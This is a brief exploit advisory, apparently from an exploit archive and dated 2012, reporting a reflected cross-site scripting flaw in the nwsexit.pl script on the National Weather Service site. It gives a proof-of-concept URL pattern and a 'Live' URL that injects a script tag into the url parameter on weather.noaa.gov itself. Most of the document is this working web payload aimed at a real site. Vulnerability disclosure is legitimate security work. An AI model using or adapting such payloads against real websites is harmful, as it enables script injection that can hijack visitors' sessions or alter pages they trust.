The National Weather Service site at weather.noaa.gov suffers from a cross site scripting vulnerability.
e04b959f09b5af9ce7f9b2cbc3bab1960972e0b243ccec283657989ff930cc26
##################################################
# Exploit Title: National Weather Service( Internet Weather Source) <= XSS Vulnerability
# Date: 17/12/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# 3Mail: ryuzaki_l@y7mail.com
# Category: webapps
# Google dork: -
# Tested on: Linux
##################################################
+---------------------------------------------------+
[~]Exploit/p0c :
http://localhost/path/nwsexit.pl?url=[XSS]
[~] Live
http://weather.noaa.gov/cgi-bin/nwsexit.pl?url="><script>alert("XSS")</script>
+---------------------------------------------------+
Greetz to : ./CyberSEC